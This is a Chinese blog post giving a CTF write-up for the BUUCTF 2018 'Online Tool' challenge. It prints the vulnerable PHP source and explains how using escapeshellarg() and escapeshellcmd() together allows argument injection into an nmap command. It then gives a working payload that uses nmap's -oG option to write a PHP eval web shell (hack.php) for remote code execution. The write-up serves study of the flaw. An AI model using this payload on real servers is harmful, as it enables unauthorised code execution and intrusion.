buuctf Online tool

最新推荐文章于 2024-01-28 20:22:07 发布
最新推荐文章于 2024-01-28 20:22:07 发布
阅读量189 收藏
点赞数
分类专栏: PHP安全 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51313108/article/details/119934606
版权

考点

  • escapeshellarg()escapeshellcmd()过滤函数的绕过
  • Linuxnamp命令的使用

代码分析

<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

无关紧要的一组代码

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

mkdir:创建一个文件夹。chdir:切换到这个文件夹然后执行namp命令

重点在else部分怎么用。因为escapeshellarg()escapeshellcmd()的出现会造成漏洞。谈谈escapeshellarg参数绕过和注入的问题
对于单个单引号, escapeshellarg 函数转义后,还会在左右各加一个单引号,但 escapeshellcmd 函数是直接加一个转义符,对于成对的单引号, escapeshellcmd 函数默认不转义,但 escapeshellarg 函数转义:
举个例子:

传入的参数是:172.17.0.2’ -v -d a=1
1.经过escapeshellarg处理后变成了’172.17.0.2’’’ -v -d a=1’,即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。

2.经过escapeshellcmd处理后变成’172.17.0.2’\’’ -v -d a=1’,这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义:http://php.net/manual/zh/function.escapeshellcmd.php

3.最后执行的命令是curl ‘172.17.0.2’\’’ -v -d a=1’,由于中间的\被解释为\而不再是转义字符,所以后面的’没有被转义,与再后面的’配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1’,即向172.17.0.2\发起请求,POST 数据为a=1’。

查找资料发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件;这个命令就是我们的输入可控!然后写入到文件!OK很自然的想到了上传一个一句话木马了…

  • ?host=' <?php eval(phpinfo());?> -oG hack.php '在经过escapeshellarg()escapeshellcmd()函数后会变成。

    ''\''<?php phpinfo();?> -oG hack.php'\'''以及

    ''\\''\<\?php phpinfo\(\)\;\?\> -oG hack.php'\\'''。我们发现想要的构造linux语句都在,都没有没过滤注释

  • 如果我们传入?host=<?php eval(phpinfo());?> -oG hack.php经过escapeshellarg()escapeshellcmd()函数后会变成。

    '<?php eval(phpinfo());?> -oG hack.php'以及

    '\<\?php eval\(phpinfo\(\)\)\;\?\> -oG hack.php'结果是完全内容被过滤。因此需要俩边添加单引号来绕过。
    构造好一句话木马 ’ <?php @eval($_POST["cmd"]); ?> -oG hack.php ’
    之后在MD5加密后的文件夹下找hack.php就可以执行RCE。拿到flag。

参考:BUUCTF 2018 Online Tool

山中雨客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF-Online Tool
m0_47571887的博客
11-10 690
这道题真的挺不常见的,考的点也有点不常见 打开题目 一段代码这里就有两个不常见的函数escapeshellarg()和escapeshellcmd(),PHP escapeshellarg()+escapeshellcmd() 之殇 给大家放个链接来理解 大概来说就是这两个函数对我们传入的数值进行单引号转义,会加上/符号,那这时候就只能往后看看能不能利用namp做点文章。 在nmap中有一个参数-oG,就是将命令和结果都写入到文件,到这里我们就可以想到上传一句话,然后写入到php文件里
[BUUCTF 2018]Online Tool
m0_62709637的博客
05-09 1318
新知识: escapeshellarg()函数: 把字符串转码成可以在shell命令里使用的参数,将单引号进行转义,转义之后,再在左右加单引号; escapeshellcmd()函数: 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义,将&#;`|*?~<>^()[]{}$\, \x0A和\xFF以及不配对的单/双引号转义; 这两个函数若同时使用,将会产生逻辑漏洞; 个人理解防范原理:将特殊符号进行转译处理,使其变为字符串,从而无法发挥正常作用; 绕过方
[BUUCTF 2018]Online Tool(特详解)
最新发布
qq_74806534的博客
01-28 2万+
即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。这意味着 PHP 脚本的当前工作目录将被更改为用户特定的沙盒目录,后续的文件和命令将在这个目录下执行。
WP-buuctf-online tool
bin789456的博客
11-13 2264
wp 这里是escapeshellarg()+escapeshellcmd()使用时出现的漏洞。 首先看下这两个函数是干啥的 这两个函数经常一起使用,先转义命令参数,再转义命令,看起来是非常正常的思路。 但是,一旦它们两个一起使用,就会出现漏洞 学习链接:https://paper.seebug.org/164/ 漏洞编号:CVE-2016-10045 ...
Seal Online Tool_tool_ToolsItem.scr_
10-02
《Seal Online Tool_tool_ToolsItem.scr》是一款专门针对网络游戏《封印传说》(Seal Online)的离线编辑工具。它主要用于编辑游戏中的物品脚本( SCR 文件),允许玩家在不连接到游戏服务器的情况下对游戏内的道具...
Online-Compile
01-30
Online_Compile
online Bagging and Boosting
03-26
Bagging and boosting are well-known ensemble learning methods. we present simple online bagging and boosting algorithms that we claim perform as well as their batch counterparts.
online_classroom.csv
03-17
CSDN因果分析系列相关数据
qt-unified-windows-x86-online.exe
07-14
"qt-unified-windows-x86-online.exe" 是一个用于Windows 32位系统的QT在线安装程序,它提供了方便的方式来下载和安装QT开发环境。 这个安装程序的核心功能包括: 1. **集成安装器**:qt-unified-windows-x86-on...
CTF_OnlineTools:存储库为CTF索引有用的在线工具
05-07
CTF在线工具 可以对有趣的在线工具建立索引的存储库。 平台类 维基 网页 https://beautifier.io/ http://jsonviewer.stack.hu/ https://pentest-tools.com/ https://tableconvert.com/ https://www.rdtoc.com/tools/jmespath https://www.rdtoc.com/tools/jsonpath 倒车 https://onlinedisassembler.com/ http://www.javadecompilers.com/ https://www.hybrid-analysis.com/ https://any.run/ 密码学 https://gchq.github.io/Cyber​​Chef/ https://www.dco
[BUUCTF 2018]Online Tool(超详细解析payload)
xlcvv的博客
04-15 3772
先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET[...
buuctf misc部分wp
a3uRa的一个窝
08-29 1万+
文章目录大白 | png图片改高度基础破解 | archpr爆破你竟然赶我走 | 打开ningen | easyLSB | ssrar | archpr爆破qr | 二维码扫描乌镇峰会种图 | 记事本打开wireshark | 导出http对象文件中的秘密 | 右键属性假如给我三天光明来首歌吧 | 摩尔斯密码镜子里面的世界 | ss爱因斯坦小明的保险箱FLAGeasycap被嗅探的流量梅花香之苦寒...
web buuctf [BUUCTF 2018]Online Tool1
weixin_44214568的博客
03-24 2907
考点:escapeshellarg()和escapeshellcmd()漏洞; RCE漏洞 通过代码审计,传参是host,最后的输出对host利用namp扫描, 主要函数就是 $host = escapeshellarg($host); $host = escapeshellcmd($host); escapeshellarg(): escapeshellarg(string$arg):string 重点:escapeshellarg()将给字符串增加一个单引号并且能引用或...
BUUCTF 2018 Online Tool
kid的博客
09-10 1万+
BUUCTF 2018 Online Tool 前言 继续刷题,学习,为了成为黑岛的一名工具人而努力! 感谢大佬提供的环境:https://github.com/glzjin/buuctf_2018_online_tool 过程 搭好环境,打开网页,出现一堆代码 OK,首先代码审计…又是php,头大… remote_addr和x_forwarded_for这两个是见的比较多的,服务器获取ip用...
ArcGIS Online:企业级云GIS平台与应用
"本文主要介绍了ArcGIS Online,这是一个由Esri公司提供的公有云GIS平台,用于构建企业级GIS应用。文章涵盖了ArcGIS Online的基本架构、功能特性、新功能以及其在组织内部资源共享和协同工作中的作用。同时,讨论了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值